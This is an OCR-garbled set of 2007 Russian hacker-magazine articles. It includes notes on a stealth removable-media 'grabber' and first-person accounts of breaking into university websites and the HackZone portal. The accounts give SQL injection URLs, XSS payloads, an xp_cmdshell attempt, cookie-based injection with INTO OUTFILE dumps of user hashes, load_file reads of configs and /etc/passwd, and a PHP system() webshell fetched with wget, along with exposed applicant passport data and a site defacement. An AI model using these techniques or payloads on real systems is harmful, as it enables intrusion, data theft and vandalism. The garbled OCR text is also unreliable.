ЕІЬЕТІМЕ 


ІЬЬазШгіЬеТіте; 


шоке 


сІмѴоІитеЗегіаІМитЪег; 


шоке 


пЕіІеЗігеНідЬ; 


шоке 


пЕіІеЗігеЬсж; 


шоке 


пЫитЬегОІЬіпкз ; 


шоке 


пЕ і 1 е I псІехН і дЪ. ; 


шоке 


пЕ і 1 е ІпсІехЬом; 



} ВУ_НАШЬЕ_РІЬЕ_ШРОКМАТІ(Ж; 

Также следует предусмотреть комбинацию горячих клавиш, блокирую- 
щую запуск граббера при вставке носителя (типа <5ЬііТ>, отключающего 
автозапуск). Впрочем, это уже детали, допускающие бесчисленные 
вариации. Лично я поступил так: если в момент вставки нового диска на 
переднем плане находится ЕАР, то граббер не запускается. Если же ЕАР 
отсутствует или вращается в бэкграунде, а работа со сменными носите- 
лями осуществляется через проводник, это расценивается каксигнал к 
атаке. Внешне все выглядит вполне невинно и никаких подозрений не 
вызывает. 

Замечания по реализации граббера под Ыпих/ВБО 

Еіпих/ВЗО встречаются на десктопных системах нето чтобы очень часто, 
но и экзотикой их назвать уже трудно. Они также поддерживают флешки 
вместе с лазерными дисками и другими съемными носителями, только 
вот готовых утилит грабежа под них что-то не наблюдается. Ну совсем 
никаких, даже самых примитивных. 

Механизм уведомлений об изменениях в файловой системе в ЦІ N IX- 
клонах реализован по-разному, и написать переносимый граббер 
просто так не получится. Впрочем, ловить уведомления совершенно 
необязательно. Достаточно написать свою обертку штатной утилиты 
тоипі(по типу в и руса -с путника), которая при попытке монтирова- 
ния съемных носителей передаст управление настоящему глоипЕу 
и тут же запустит граббер, замаскированный под антивирус. 

Как говориться, дешево и сердито. Зато системно независимо и 
надежно (кстати, описанный прием распространяется втом числе и 
на аиіо-тоипі). 

Грабеж образов с носителей осуществляется путем открытия соответс- 
твующих устройств (перечисленных в каталоге/сіеѵ) системным вызовом 
ореп с последующим чтением их содержимого системным вызовом геасі. 

В общем, написать приличный ІІЫІХ-граббер (даже не будучи гуру) совсем 
несложно. 

Заключение 

Грабеж нетакое уж сложное дело, если к реализации граббера подойти 
с головой. Не нужно использовать готовые шпионскиеутилиты, все они 
— барахло! Всегда лучше написать свое, заточенное строго под самого 
себя (любимого), чем брать чужой глюкодром. Ш 



► 058 



ХАКЕР 08/ 104/07 





Кшііч.. 

Гнн-і. г ИГі ИтгІи^ТІ- нч ■>т 1 п і ;нт «_ъч ч . ■ тл нлн-г-гг мі|Лі- р 'Гіг+и Т". К 1 Т - >'і ПЛ ГіѴ!" щм-» "'■-■і - ч и- ■. г ►г.-р-* 



город »*?* 1 ^ м 1 

-лк^ 

осьминоги! 

Поэтому пробки! 





ѵѵмѵѵ.1:п1:-1ѵ.т 







» Е=: Л м К-.-1 




Поступаем в институт 



Атака на крупнейшие вузы страны 

Летняя пора связана для многих со сдачей экзаменов и с оформлением документов в самые раз- 
ные вузы страны. В свое время указанные процедуры не обошли стороной и меня :). Еще тогда 
в моей голове возникла идея чекнуть ресурс учебного заведения, в которое я собирался посту- 
пать, на наличие багов. Уязвимости были найдены, но, познакомившись с админами и успешно 
пройдя у них летнюю практику, я выложил им подробное описание дырок и дал пару советов. 

С тех пор многое изменилось, но желание протестить на защищенность крупнейшие вузы стра- 
ны осталось. Только подумай, сколько студенческой инфы лежит на серверах вузов. Сейчас 
каждый институт имеет свою службу безопасности, а кругом постоянно толкуют о реформе в 
сфере образования. Провести в такой ситуации «боевые учения» представлялось достаточно 
интересным мероприятием. Этим я и занялся, проникнув в электронные застенки некоторых 
крупных вузов =). 



От ГСОісГа с любовью 

Расправившись с летней сессией и получив кучу свободного времени, 
я, естественно, в первую очередь начал бух... то есть думать над 
выбором первоначальной жертвы атаки =). Тогда я как раз расстался 
со своей девушкой, так что искомый объект определился сам собой 

— место ее обучения :). Универ носил гордое название Дальневосточ- 
ного государственного медицинского университета, а сокращенно 
просто ДВГМУ. Вуз имел свой сайтик, располагающийся по адресу 
ѵѵѵѵѵѵТезти.ги и. судя по весьма приличному количеству студен- 
тов, нехилую БД. Прогулявшись по ресурсу и машинально отметив 
неказистый дизайн, я обнаружил регулярное обновление новостей, 
что свидетельствовало по крайне мерее о присутствии админа или 
лица ему подобного =). В качестве разминки я решил осмотреть д виг 
вручную, тем более что, по первому впечатлению, ничего путного мне 
не светило. Ни админки, ни авториза для юзеров, ни форума, ни чата 

— ничего из этого мной обнаружено не было. Вернее, админка была, 
но, видимо, ее попросту не успели дописать, так как на странице логи- 
на, вместо стандартной формочки авторизации, висели новости: 
ЬирУ/ѵѵѵѵѵѵТезти.ги/Цпі/І-од/І-одіпА.азр . 

Все чмоды были выставлены грамотно, поэтому попытки просмотреть 
содержимое конкретно взятой диры не приносили результата. Смекнув, 
что события начинают принимать нежелательный для меня оборот, я 



запустил сканирование портов со своего дедика в надежде найти хоть 
какую-нибудь зацепку. Тем временем мои опасения подтвердились на 
ѵѵѵѵѵѵ.сІотаіпзсІЬ.пеС Согласно отчету сервиса, никаких других ресурсов, 
кроме ѵѵѵѵѵѵТезти.ги . на сервере не имелось. Чисто случайно я наткнул- 
ся на поддомен ЬирѴ/таіІТезти.ги . но итам висела лишь апачевая 
страница приветствия. Однако через несколько минут мне на глаза по- 
пался линк на электронную библиотеку/ каталоги. Прикинув, что движок 
для подобного рода вещей пишется, как правило, отдельно, я кликнул 
по ссылке. Сразу скажу, что моя интуиция не подвела меня и на этот раз, 
благодаря чему весь последующий процесс взлома занял максимум 
минут 1 5 :). Д виг электрон ной библиотеки, как я и ожидал, функциони- 
ровал автономно и был написан на А5Р, и написан достаточно криво =). 
За пару минутя узрел несколько явных инъектов: 

Ъ.ССр: / /шт. Севши . ги/ ІпСогшСепСег/ СаСаІод/ ІпСо / 
АгСісІе . азр?АгСіс1еІБ=5187б%27 

ЪССр : / /шт. Севши . ги/ ІпСогшСепСег /СаСаІод /ЗеагсЬ/ 
АиССюг . авр?Каше=ЫаЫа%27&РадеЗІ2е=2 5 

Ъ.ССр: / /шт. Севши . ги/ ІпСогшСепСег /СаСаІод/ ЗеагсЪ./ 
веагсЬ. авр?СаСа1од=1&ТіСІе=ЫаЫа%27&РадеЗІ2е=25 
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Админка на сайте ЦМО МГУ 



ЪЩЦр : / /ѵпт. Гезти . ги/ ІпіогтСепСег/СаРаІод/ 

Зеагск/ Неасііпд . азр?Ыате=ЫаЫа%27 

Одним словом, поиск по каталогам (вместе с его багами) пришелся как 
нельзя кстати :). Для своих целей я взял последний инъектик, который и 
решил раскрутить. Результат не заставил себя долго ждать, тем более что 
количество полей равнялось одному. Я сделал запрос о версии базы: 

ЫзСр : / / ѴТѴ7Ѵ7 . іезти . ги/ ІпіогтСепСег/СаСаІод/ЗеагсЬ./ 
Неасііпд . азр?Ыате=-1%27+ипіоп+зе1есС + @@ѵегзіоп-- 

И 50І_-сервер выплюнул мне всю необходимую инфу: 

МісгозоіС 8С>Ь Зегѵег 2000-8.00.818 (ІпСеІ Х86) Мау 
3 12 003 16 : 08 : 15 СоругідіЩ (с) 1988-2003 МісгозоіР 
СогрогаСіоп ЗСапсІагсі ЕсііСіоп оп ЭДіпсіоѵтз Ж 1 5 . 0 (Виіісі 
2195: Зегѵісе Раск 4) 

Какты уже догадался, на сервере крутилась Винда, да еще и в совокуп- 
ности с М550Ц что практически полностью развязывало мне руки =). 
Поиграв сзапросами, я быстро нашел табличку изег: 

ЪЩрр : / /тш. іезти . ги/ ІпіогтСепСег/СаРаІод/ЗеагсЪ./ 
Неасііпд . азр?Нате=1%27+ипіоп+зе1есС+ТАВЬЕ_ 

ИАМЕ + і г ош+ 1 ЫЕОКМАТ I (Ж_8 СНЕМА . ТАВЬЕ 8 - - 

И вследствие нехитрой квери получил админский аккаунт: 

ЫзСр: / /шш. Гезши. ги/ ІпіогтСепСег/СаРаІод/ ЗеагсЪ./ 
Неасііпд . азр?Ыате=1%27%2 Оипіоп+зеІесС+раззѵгогсі+Ггот+и 
зегз+ѵіЬеге+пате= ' асітіп ' -- 

Сам а кк и мел такой вид: 

асітіп : 123456 

123456 — не что иное, как пасс. По правде сказать, увиденное вызвало 
у меня даже не улыбку, а просто-таки скупую мужскую слезу умиления =). 

Я зашел в раздел авториза: 

Ъ.ССр : / /тт. іезти. ги/ ІпіогтСепСег/СаСаІод/Ьодіп . азр 

Ввел полученные данные и успешно получил админские права. Я был 
полностью удовлетворен, но все-таки решил попробовать получить еще 
и шелл. Какты знаешь, через М55СП_ возможно выполнение команд в 
системе: 

Ъ.ССр: //тала т. іезти. ги/ ІпіогтСепСег/СаРаІод/ЗеагсЪ./ 
Неасііпд . азр?Ыате=1 ' ; +ехес+тазСег . .хр_ 




Х55 на одном из поддоменов МГУ 

стсізЪ.е11+ "пеСзСаС»-- 

Однако вэтом случае мне не повезло, так какадмин заботливо лишил 
моего юзера прав: 

МісгозоГС] [ОБВС ЗОЬ Зегѵег Бгіѵег] [ЗОЬ Зегѵег] ЕХЕСИТЕ 
регшіззіоп сіепіесі оп оЬз'есС ' хр_стсіз]те11 ' , сіаСаЬазе 
'тазСег', оъгпег ' сіЬо ' . 

Тем не менее, полистав админку и приглядевшись к базе, я понял, что 
ловить здесьболыше нечего. Потеряв после взлома всякий интерес к 
ресурсу, я с чистой совестью закрыл браузер. 

Важный МГУ 

Оставивза плечами взломанную базу и админкуунивера своей бывшей 
девушки, мне захотелось большего. И не просто чего-то большего, а 
конкретно МГУ. Да-да, ты не ослышался, я говорю именно о Московском 
государственном университете — крупнейшем вузе в стране. Не помню, 
когда в моей голове зародилась столь бредовая идея, могутолько сказать, 
что пренебрегать ей я явно не собирался =). Не долго думая, я приступил 
кее реализации. Сайт МГУ располагался по адресѵ ѵѵѵѵѵѵ.тви.ги . Никаких 
других ресурсов на сервере выявлено не было, за исключением огром- 
ного количества поддоменов разныхуровней. Удобнее всего парсить их 
было через Гугл, поэтому, задав нехитрую кверю, я получил в качестве 
результата около сотни линков: 

ЫзСр : / /шт. доодіе . ги/ зеагс1т?Ы=еп&д=іпиг1% 

ЗАтзи . ги&ЬСпС=Соод1е+8еагс1т 

Поглядев с минуту на выплюнутый Гуглом ответ и представив объем пред- 
полагаемых работ, я вошел в ступор. Честно говоря, перспектива про- 
вести все лето за монитором в обнимку с клавой в надежде выудить-таки 
хоть что-то из электронных недр первого универа в стране меня мало 
впечатляла. Погуляв по главному сайту и зайдя в раздел «Сайты МГУ», я 
обнаружил ту же картину, что и в Гугле. Но делать было нечего, единствен- 
ное — я решил сначала пропарситьс помощью поисковика ресурсы на 
РНР-движках, а потом уже заняться всем остальным. Конечно, я надеял- 
ся, что до «всего остального» очередь просто не дойдет :]. Кроме того, с 
годик назад я уже как-то приступал к реализации подобной затеи — атаки 
на МГУ, поэтому несколько козырей в рукавеу меня имелось. Первым 
делом я проверил найденный мной ранее локальный инклуд: 

ЫзСр : / /ѵ\пл т . зосіо .тзи . ги / ?з = зсіепсе&р 

/еСс/раззжі%00 

Увы, ноадмин пропатчил двиг, и, кроме неприветливой надписи, 
сообщающей о том, что запрос неверен, я не получил ничего. Аналогич- 
ная ситуация была и сХ55 на ѵѵѵѵѵѵ.есоп.тви.ги . Важный скрипт просто 
удалили :(. Но сдаваться без боя я не собирался — я предполагал, что 
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При наличии прав 
через М5БСИ_ можно 
выполнять произ- 
вольные команды в 
системе, помни об 
этом. 

Зачастую баги лежат 
у нас под носом, и 
даже грамотно на- 
писанный двиг могут 
погубить мелочи 
типа неправиль- 
но выставленных 
чмодов. 










> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с це- 
лью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 



легкой прогулки не получится. Как говорится, тише едешь 

— дальше будешь. Руководствуясь этой народной мудрос- 
тью, я приступил к парсингу поддоменов. Примерно через 
час было найдено два скул-инъекта на ЫірУ/сопГтзи.ги : 

ПССр : / /сопТ .тзи . ги : 777 8 /сопГегепсе/ѵ/Ьг 
омзе . Ъгомзе_сопГз?ЪготАгзе_тосІе=Ъузсіагеа&аі 
с1=16652%27 

ПССр : / /сопі .тзи . ги : 777 8 /сопРегепсе / зСаСіс_ 
ГЩтІ . з1зотл^_рге1одіпраде?с1ігесСіоп_Суре=Со_ 
огдапі ге&1апд_іс!_ргт=2%2 7 

Судя по еггог’у, который выдавал еще и часть лога, мне 
предстояло связаться с Ораклом: 

ОКА- 0 65 02 : РЬ/8С>Ь: пишегіс ог ѵаіие еггог : 
скагасСег Со пишЬег сопѵегзіоп еггог 
ОКА-06512 : аС Ііпе 10 

БАБ паше : сопіегепсе 

РКОСЕББКЕ : ѵПэгслѵзе . Ьгоѵ^зе_соп1з 

Подумав, я решил оставить обнаруженное на крайний 
случай. Зато в разделе «Конференции» меня ждал сюрприз 
в виде активной ХЗЗ'ки: 

ПССр : / /сопС .тзи . ги : 7778 /сопГегепсе/ѵ/Ьгомзе . 
Ьгоѵ^зе_соп1з?Ьгоілгзе_то(іе=1и111ізС&1апд_ 
іс1_ргт=2&С]гетез_кѵ\г= " ><зсгірС>уоиг_ 

3 зсос!е< / зсгірС> 

Значение параметра іЬете5_кѵѵ не фильтровалось, и достаточ- 
но былоза крыть ѵаІие-символами«">», после чего уязвимость 
переходила в разряд повышенной боевой готовности =). 
Отложив в сторону прочеканные поддомены, я принялся 
за следующий — ѵѵѵѵѵѵ.кі.тви.ги . По правде сказать, я сам 
довольно смутно представлял себе, что я ищу. Так что мой 
рейд больше напоминал больничный осмотр пациентов 
:). Кстати говоря, на ѵѵѵѵѵѵТк.тзи.ги мне повезло не меньше 

— два типичных инъекга: 

кССр: / /шт. 111 .тзи. ги/ѵезСпік. 
ркр?ѵезкпікіс1=-1+огс1ег+Ъу+5 / * 

кССр: / /шяѵг. 111 .тзи. ги/рТюкоз . ркр?да1іс1= 
-1+огсІег+Ъу+9 / * 

Оба линка мгновенно переместились в закладки моей 
Оперы =). Далее, отличился исторический факультет МГУ, 
подарив еще одну Х55: 

ПССр : / /іпіо . деоі .тзи . ги/сіЪ/]тізС_ 
зеагск/ ?д=<зсгірГ>уоиг_ 

3 зсос!е</ зсгірС>&зіСе=ЕК 

Особенно порадовал Астронет, через который осуществлял- 
ся поискпо главному сайту МГУ: 



ГШГр : / /талам. азСгопеГ . ги/сПэ/тзизеагск/ іпсіех . 
ПСт 

1?д=<зсгірС>уоиг_з зсосіес/ зсгірС>&Гтр1 = 
%СЕ%Е0%Е8%Е2%Е5%Е2&рз= 

2 0&дгоир=2&зіСе=ТАПАМ.тзи . ги 

Как говорится, без комментариев :). Но все это мелочи 
по сравнению стем, что было найдено на сайте Центра 
международного образования МГУ — ѵѵѵѵѵѵ.сіе.ги . На первый 
взгляд, движок написан достаточно грамотно, но админка, 
вернее сказать, чмоды на админку... В общем, перейдя по 
ѵрлѵ ѵѵѵѵѵѵ.сіе.ги/абтіп . я лицезрел следующее: 

сопГід . ркр 
Гад/ 

Гогт.ркр 
СооІкіС . ркр 
Гоо1кік_сопГід . ркр 

Конфиги прочитать неудалось, а для логина в РАО и РНРВВ 
Абтіп ТооІКІІ требовался админский аккаунт. А при обра- 
щении к скрипту іюгт.ріір я получал админские права =). 
Главной фишкой была возможность просмотра и редакти- 
рования личных конфиденциальных анкет иностранных 
абитуриентов, готовящихся к поступлению в МГУ. Записи 
выглядели следующим образом: 

Фамилия: ШІ1**** 

Имя (имена) , отчество: Еѵап Раиі 
Дата рождения : 25.0*. 1989 
Пол: мужской 
Гражданство : США 
Номер паспорта: 711376*** 

Действителен до : 8.0*. 2 015 

Место рождения (страна) : БпіСесі ЗСаСез оі 

Атегіса 

Месторождения (город): ****, СаІіГогпіа 

Далее прилагалась инфа о роде деятельности, месте работы, 
атакже сведения о дате прибытия в Москву. На минутку я 
представил себе, какие последствия может повлечь за собой 
утечка подобных данных (особенно в руки националистичес- 
ких организаций), и принял единственно верное решение 
— незамедлительно накатать мессагу админам ресурса. 
Послеувиденного я уже был не в состоянии парсить остав- 
шуюся часть сайтов, да и смысла в этом не было никакого. 
Улыбнувшись, я выключил ноут, оделся и вышел на улицу. 

Постскриптум 

Как видишь, нет ничего невозможного. Один мой знако- 
мый любил говорить, что профессионализм — это когда ты 
ломаешь не то, что можешь, а то, что хочешь =). Наверняка, 
ты уже ринулся атаковать сайт собственного вуза, поэтому 
надолго не задержу. Возможно, и с МГУ тебе повезетеще 
больше, чем мне. Только не забудь оповестить админов о 
своих добрых похождениях — поверь, они будут несказан- 
но рады :). □С 
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Вторжение в ХакЗону 

Идеальной защиты не существует 

Бывало ли у тебя так: сидишь ты на каком-нибудь портале, в твоем черном умишке роятся мыс- 
ли о взломе, но тут закрадывается сомнение в невозможности этого и ломает весь кайф? На 
Ьаскгопа.ш я узнал многое, и взлом самой ХакЗоны казался мне чем-то нереальным и в какой- 
то степени даже кощунственным :). Но лозунг ХакЗоны гласит: «Все, что создал человек, можно 
взломать, идеальной защиты не существует». 



Как все начиналось 

Дело было ночью. От нечего делать я читал статейки, сохраненные на 
винте, и, признаться, это мнеуже порядком надоело. Нотут, наткнувшись 
на материал по хаку одного девелоперского портала, я воспрял и, ощутив в 
себеуверенность и силу, набрал в Опере Івзгш (второй домен ХакЗоны). 
Прежде всего нужно было определиться с целью взлома. Так как ни- 
какой выгоды из злодеяния я извлекать не собирался, я решил просто 
задефейсить сайт. Надо было с чего-то начать. Сканить хост на предмет 
бажных демонов не хотелось. Перебирать параметры в поисках инъек- 
ций казалось глупым, но я все же немного поигрался с параметрами. 

К сожалению, это ни к чему полезному не привело. Но мое внимание 
привлек модуль поиска, который красовался на главной странице. Вбив 
в поиск «всКд», я нажал на кнопку «Поиск». Открыв сорцы страницы с 
результатами работы скрипта, я обнаружил следующую строчку: 

<іприД зл_2е="2 5" Вуре= " ВехЪ " пате= "ортегу" 
ѵа1ие= " зсібзсі" > 

Проведя поиск по значению «" >{ев1», яувидел то, что ты можешьнаблю- 
дать на рисунке. 

Просмотрев код, я обнаружил: 



сіприВ зІ2е="25" Вуре= " ВехВ " паше= "риегу " 
ѵа1ие= " " >ВезВ " > 

Как видишь, я выбрался за пределы тэга иуже мог вставлять код втело 
страницы. Но проведя поискпозначению «“><5сгір1>а1еіі(«х55»)</ 
5сгірі>», я получил редирект на главную пагу портала :(. Судя по всему, 
параметр поиска избирательно фильтровался. 

Нужно было искать какой-нибудь не совсем стандартный баг. И тут я вспом- 
нил, что параметры в скрипты могут передаваться еще и через кукисы. 
Недолго думая, я полез смотреть, чтоу меня в печеньках (смотри рисунок): 
Параметр ивег, скорее всего, используется для аутентификации и пред- 
ставляет наибольший интерес. В большинстве случаев кукисы шифру- 
ются алгоритмом Ьазе64. Для перекодировки из Ьазе64 написано много 
тулз, например п57_Ьаве64.ехе, также можно воспользоваться следую- 
щим РНР-скриптом: 

<Ысш1> 

<Ьеас1><ВіВІе>Вазе64 епсосіег/сіесосіег Ьу В0т</ВіВІе></ 
Ьеас1> 

<Ьосіу><богт теВ]госі= " деВ " асВіоп=" с1.рЪр"> 

<іприВ Вуре="ВехВ" пате= " іпз " ><р> 
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<іприк куре= " зиЪтік " ѵа1ие=" до" ></Гогт> 

< ?ркр 

$іпз = $_СЕТ [ " іпз " ] ; 

$с!ес=Ъазе64_с1есос1е ( $іпз) ; 

$епс=Ьазе64_епсос!е ( $іпз) ; 

еско ( "Епсосіесі: $епс<р/>"); 

еско ( "Ьепсосіесі: $с!ес"); 

?> 

</Ъос1у></ккт1> 

Перекодировав значение своих печен юшек, я получил: 

60505 : С От: 07а67ке69асеЗ 155943 852 5Ъ063 5666(1: 10 : : 0 : 0: 0 
: 0 : : 4096 

Где-то я уже это видел. Все это очень напоминало РНРЫике, известный 
своей дырявостью ;). За время его существования в нем успели найти 
предостаточное количество уязвимостей. Это радовало. 

Вставив апостроф после ника, я закодировал строку и поменял значе- 
ние в соокіе-файле через Оперу. Без особых надежд я обновил страницу 
и, подождав несколько томительных секунд, увидел сообщение об 
ошибке БД. 

Еггог іп оЫаіпіпд изегсіака : Іодіп 
ЬЕВШ МОБЕ 

ЗОЬ Еггог: 1064 Уои каѵе ап еггог іп уоиг ЗОЬ зупках; скеск 
Оке шапиаі Скак соггезропсіз ко уоиг МуЗОЬ зегѵег ѵегзіоп 
ког кке гідкк зупках ко изе пеаг ' 'кОт' ' ' ак Ііпе 3 
ЗЕЬЕСТ изег_іс1, изегпаше, изег_раззъгогс1, изег_аскіѵе, 
изег_1еѵе1 ЕКОМ ѵооѵ_изегз ШЕКЕ изегпаше = 'кОт' ' 

Ыпе : 775 

Еііе : /коте/рарапуа/ѵ\плплг/каск 20 па . ги/іпсіисіез/ 
кипскіопз .ркр 

Сначала я не поверил своим глазам. Ну уж никак не ожидал я, что все 
будет та к просто. Немного отойдя от шока, я принялся изучать отчет об 
ошибке. Прежде всего строки «сЬескібе тапиаиЬаі соггезропсіз іо уоиг 
МуЗОБ зегѵег» свидетельствовали о том, что в качестве БД используется 
сервер Му50І_. Особенно меня порадовала строка: 

ЗЕЬЕСТ изег_іс1, изегпаше, изег_раззъгогс1, изег_аскіѵе, 
изег_1еѵе1 ЕКОМ ѵооѵ_изегз ШЕКЕ изегпаше = 'кОт' 

Глупый «мускул» сделал за меня половину работы, вернув и имена 
столбцов, и название базы :). К полезной информации можно отнести 
также строку «/Иоте/рарапуа/ѵѵѵѵѵѵ/Иаскгопа.ги/іпсІибеБЛипсііопз.рЬр», 
которая указывает полный путь к каталогу с движком сайта. Дело остава- 
лосьза малым. Мне надо былотолько скормить БД нужный мнезапрос. Я 
сформулировал запростак: 



'ШІОБ ЗЕЬЕСТ пиіі, изегпаше, изег_раззѵтогс1, пиіі, пиіі 
ЕКОМ ѵооѵ_изегз/* . 

Думаю, объяснять ничего не нужно, так как о скул-инъекции на страницах 
журнала писали не раз. Вставив все это дело в куки, я получил вразуми- 
тельный ответ: 

6 0505 :кОш'ШІОЫ ЗЕЬЕСТ пиіі, изегпаше, 
изег_раззъгогс1, пиіі, пиіі ЕКОМ ѵооѵ_изегз/ 

* : 07а67 ке69асеЗк55943 852 5Ъ063 5666с1: 10 : : 0 : 0 : 0 : 0 : : 4096 , 

Перекодировал его и заменил значение в куках. Когда я обновил стра- 
ницу, мне почему-то вернулась пустая пага. Ни таблицы, ни юзернеймов, 
ни хешей... Почесав репу, я начал листать доки по скул-инъекциям и 
вдруг вспомнил о конструкции ІЫТО ОІІТРІБЕ, с помощью которой можно 
выгрузить выборку в файл на сервере. Конструкция имеет следующий 
синтаксис: I піо Оикііе ‘раІкЛіІе’, причем присутствие ГРОМ в запросе 
обязательно. Но сначала нужно было найти директорию, в которой у нас 
есть права на запись. Скорее всего, это папка с аватарами. Зайдя на ветку 
форума, в свойствах аватара первого встречного я посмотрел путь к папке 
с аватарами: /тобиІез/Рогитз/ітадез/аѵаІагз. Я сформировал кукис: 

60505 : кОт'ІШІСЖ ЗЕЬЕСТ изег_іс1, изегпаше, 
изег_раззілгогс1, изег_аскіѵе, изег_1еѵе1 ЕКОМ 
ѵооѵ_изегз Іпко Оиккііе /коте/ 

рарапуа/ѵллплМкаскгопа . ги/тосІиІез/Еогитз/ 
ітадез/аѵакагз/ зсіЕз 4502НкЬКогтк56 . дік ' / 

*: 07а67 ке69асеЗ 155943 8525Ь063 5666сі: 10: : 0 : 0 : 0 : 0 : : 4096 , 

И, заботливо перекодировав его, заменил значение в кукисах. 

Обновив страницу, я увидел пустую таблицу «Информация», что, как 
мне показалось, свидетельствовало об удачном выполнении запроса. 

Я перешел по ссылке Ьаскгопа.ги/тобиІез/Рогитз/ітадез/аѵаіюгз/ 
ібР]4502НсЦКогтІ : 56.дИ : и скачал картинку весом 4 Мб :). Открыв блокно- 
том суперкартинку, я увидел все юзернеймы и хеши пользователей. 
Брутхешей админов, каки предполагалось, ничего недал, но мнеэто и не 
надо было, так как Ыике проводитаутентификацию через куки с помощью 
хешей. Заменив инфу в куках инфой одного из админов, я зашел на пор- 
тал. Я мог читать приватные сообщения админа, оставлять комментарии 
под его ником, но заветной кнопочки «Админка» не было :(. Перепробо- 
вав варианты типа абт, абтіп, абтіпізігаіог, я так ничего и не нашел. 

В поисках панели админа я обратился кстаромудругу гоЬоізіхЬ Самым 
маленьким поясню, что в го Ьоіз.М хранится список ресурсов, которые 
не должны кэшировать поисковики. Найти его всегда можно по адресу 
ЬкрУ/зке/гоЬоІзІхЬ В роботах ХакЗоны я увидел следующую инфу: 

Ьзег-адепк: * 

Ьізаііом: кгдо.ркр 
Ьізаііом: /асітіп/ 
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— «виновница тор- 
жества» 
Ьир://ігцесііоп. 

ГЦ ІѲ22. ги — подборка 
материалов по 
ЗОЫщесбоп. 



> ѵѵагпіпд 

Все трюки, 
рассмотренные в 
статье, выполнялись 
профессиональны- 
ми каскадерами, 
и повторять их в 
домашних условиях 
не рекомендуется, 
так как многое из 
описанного подпа- 
дает под статью 272 
УК РФ. 



Бізаііом: /ітадез/ 

Бізаііом: /іпсіисіез/ 

Бізаііом: /ББетез/ 

Бізаііом: /Ыоскз/ 

Бізаііом: /тосіиіез/ 

Бізаііом: /Іапдиаде/ 

НозБ : шш. Баскгопа . ги 

Мое внимание привлекла строчка «Оіваііоѵѵ: Ьгдо.рЬр». Это, 
наверно, и была заветная админка. Перейдя по адресу 
ѵѵѵѵѵѵІББГ.ги/Ьгдо.рЬр . я получил лишь сухой редирект на 
главную страницу портала :(. В голове сразу стали появляться 
мысли о блокировке по ІР и прочий бред. На админку было 
решено на некоторое время забить. 

В идеале хотелось найти пасс админа и получить зЬеН-доступ ;). 
Так какбрутхешей результатов не дал, нужно было найти 
какой-нибудь файлик, где пассхранится в открытом виде. 

Я подумал о конфиге движка сайта, где в открытом виде 
лежал пасс к БД (который мог подойти к чему-нибудь еще). 
Прочитать файл с сервера можно функцией БоасІ_РІІе. Я 
набросал кукис,- 



6 0 5 0 5 : Б Ош 1 ІЖІСЖ ЗЕБЕСТ 1оасЗ_Бі1е 
Боте/рарапуа/ѵлллѵ/Баскгопа . ги/сопБід . 
рБр 1 ) , пиіі, пиіі, пиіі, пиіі ІпБо 
ОиББіІе /Боте/рарапуа /ѵгтя/ 

Баскгопа . ги/шосіиІез/Еогишз/ ітадез/ 
аѵаБагз/ ^сІЕ^ 4502НсІБКогтБ57 . діБ ' / 

* : 07а67 Беб9асеЗ Б55943 8525Ь0б 
ЗБбббсі: 10 : : 0 : 0 : 0 : 0 : :409б, 

Закодировал его в Ьазе64, поменял значение в куках и 
обновил страницу. Сервер судовольствием скушал печеньку 
и вернул пустую таблицу «Информация». Затем я скачал 
ка ртинку запросом Ьаскгопа.ги/тобиІеБ/ВогитБ/ітадеБ/ 
аѵаіа гб^'сі Р] 4502 Н сЦ КогтІ'БУ.діІ . Открыв ее стандартным 
блокнотом, я увидел конфигХакЗоны. Среди прочего была 
строка «РНР-ЫІІКЕ: АбѵапсесІ Сопіепі МападетепіЗузіепп», 
что подтверждало мои догадки о нюке. В конфигах я увидел 
такие строки: 



С помощью Іпіо ОиНіІе можно делать много очень интересных вещей. 



выполнить запрос: 



Например, можно 



ІШІОЫ ЗЕБЕСТ пиіі, '<?рБр $сшсі = $_СЕТ [ " стсі" ] ; зузБет ( $стсі) ;?>' , пиіі, 
пиіі, пиіі ЕКОМ ТаЫеБате ІпБо ОиББіІе ' раББ/стсБ рБр 1 

Затем залить скриптик, выполняющий команды. Адалеезапросом ЫНрУ/зіІе/раІк/стсІ. 
рИр?стсІ= ѵѵдеі -0 раНп/зЬеЦ.рЬр Ыір ://уои ГБІІе/зеІІ.ІхІ закачать полноценный шелл. 



Админ-панельХакЗоны 



$с1Ьипате = " гооБ"; 

$(1Ьразз = " " ; 

Строчка «$бЬраз5= " " ;» убила все надежды :( , но сам факт 
того, что я могу читать файлы с сервера, не мог не радовать. 
Далее я попытался прочитать/еІс/разБѵѵб запросом: 

ІШІСЖ ЗЕБЕСТ 1оас1_Бі1е /еБс/ 

разз^сі' ) , пиіі, пиіі, пиіі, пиіі ІпБо 
ОиББіІе /Боте / р арапу а /ѵмѵі/ 

Баскгопа . ги/тосіиІез/Еогитз/ ітадез /аѵаБагз/ 
3 СІЕ 3 4802НсіБКогтБ57 . діБ ' / * 

Это мне очень даже удалось. Но та к как в целях обеспечения 
безопасности /еіс/раззѵѵб обычно используются схемы со 
скрытыми паролями, реальных паролей я неувидел. Чтобы 
прочитатьМс/зНасІоѵѵ, прав, естественно, не хватало :(. 

Было решено вернуться кадминке. Отрыв где-то в недрах вин- 
честера архив с нюком, я установил его себе на комп и зашел 
под админом. Потом я полез смотреть кукисы (смотри рисунок). 
Как видно, для аутентификации под обычным пользователем 
и под админом используются два разных кукиса. Перекоди- 
ровав пикеабтіп, я получил абтіп:8еЗИ 70бе8805548605349 
536е1еааЬ0. Заменив имя и хеш пользователя ником и хешем 
одного из админов ХакЗоны, я перекодировал значение в 
Ьазе64. Также пришлось поменять в кукак параметр изег на 
абтіп. Сделав все и скрестив пальцы на удачу, я обновил 
страницу... Через несколько секунд, кроме всего прочего, на 
странице, я лицезрел л инк на админ-панель — передо мной 
предстала админка во всей ее красе ;). 

В админ-панели было много функций, но, полазив по ссыл- 
кам, я не нашел ничего, что могло представлять интерес. 
Лишь кнопка «Сохранить БД» переливалась всеми цветами 
радуги итак и просила ткнуть в нее курсором. Преодолел ли 
я соблазн? Пусть это останется моей маленькой тайной :). 
Просто та к уходить не хотелось, и я решил оставить себе на 
память небольшой сувенир. Перейдя в раздел «Настройки», 
я дописал к имени сайта «Ргеіпбіу баск ЬуШгл» и сохранил 
изменения. После проделанных действий втайтлеХакЗоны 
появиласьзаветная строчка, сообщающая, что некий него- 
дяй с ником Шгш дружески поимел ХакЗону :). ц-ц 
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МАТЕРИАЛЫ и:і 











